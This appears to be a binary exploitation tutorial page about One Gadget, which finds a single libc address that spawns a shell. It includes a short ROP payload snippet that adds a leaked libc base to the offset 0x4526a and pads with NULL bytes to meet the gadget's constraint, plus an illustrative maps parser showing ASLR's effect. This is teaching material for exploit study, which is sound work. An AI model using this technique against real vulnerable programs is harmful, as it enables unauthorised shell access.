# One Gadget
## Basic Information
[**One Gadget**](https://github.com/david942j/one\_gadget) lets you obtain a shell without using **system** and **"/bin/sh"**. **One Gadget** searches the libc library for a way to obtain a shell (`execve("/bin/sh")`) using just one **address**.\
However, there are usually some constraints; the most common ones, which are easy to avoid, look like `[rsp+0x30] == NULL`. Since you control the values inside **RSP**, you just need to send a few more NULL values to avoid the constraint.
![](<../../.gitbook/assets/image (615).png>)
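```python
# libc.address must already hold the leaked libc base; 0x4526a is the offset reported by one_gadget
ONE_GADGET = libc.address + 0x4526a
# base is the padding up to the return address; the trailing NULL bytes satisfy [rsp+0x30] == NULL
rop2 = base + p64(ONE_GADGET) + b"\x00"*100
```
To the address reported by One Gadget you need to **add the base address where `libc` is loaded**.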
{% hint style="success" %}
One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and can **simplify ROP chains**, since you only need to call one address (and satisfy the requirements).
{% endhint %}
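The base-address step above, as an added example that is not part of the original page: it resolves the page's offset `0x4526a` against two `/proc/<pid>/maps` excerpts and checks that the result lands in an executable libc mapping, which shows why a base from one run is useless under ASLR in the next. The maps text, the libc file name and all function names are constructed for illustration.

```python
import re
from typing import NamedTuple

# Constructed /proc/<pid>/maps excerpts (not real captures); libc path and layout are assumptions.
RUN_A = """\
555555554000-555555556000 r-xp 00000000 08:01 1311 /home/user/vuln
7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 2228 /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 2228 /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dcd000-7ffff7dd1000 r--p 001c0000 08:01 2228 /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dd1000-7ffff7dd3000 rw-p 001c4000 08:01 2228 /lib/x86_64-linux-gnu/libc-2.23.so
"""
RUN_B = RUN_A.replace("7ffff7", "7f3c1e")  # same layout under a different ASLR slide

class Seg(NamedTuple):
    start: int
    end: int
    perms: str
    offset: int
    path: str

LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) (\S{4}) ([0-9a-f]+) \S+ \d+\s+(\S.*)$")

def parse_maps(text):
    """Turn maps text into Seg records, skipping lines without a backing file."""
    segs = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            start, end, perms, off, path = m.groups()
            segs.append(Seg(int(start, 16), int(end, 16), perms, int(off, 16), path))
    return segs

def libc_segments(segs):
    return [s for s in segs if re.search(r"/libc[-.][^/]*$", s.path)]

def libc_base(segs):
    # The load base is the start of the mapping that covers file offset 0.
    return min(s.start for s in libc_segments(segs) if s.offset == 0)

def resolve(segs, file_offset):
    """Return libc base + offset, refusing results outside executable libc memory."""
    addr = libc_base(segs) + file_offset
    if not any(s.start <= addr < s.end and "x" in s.perms for s in libc_segments(segs)):
        raise ValueError(f"{addr:#x} is not in an executable libc mapping")
    return addr

if __name__ == "__main__":
    for name, run in (("run A", RUN_A), ("run B", RUN_B)):
        print(name, hex(resolve(parse_maps(run), 0x4526a)))
```

The same offset resolves to a different absolute address in each run, so an address computed from an old base points at the wrong place once the slide changes.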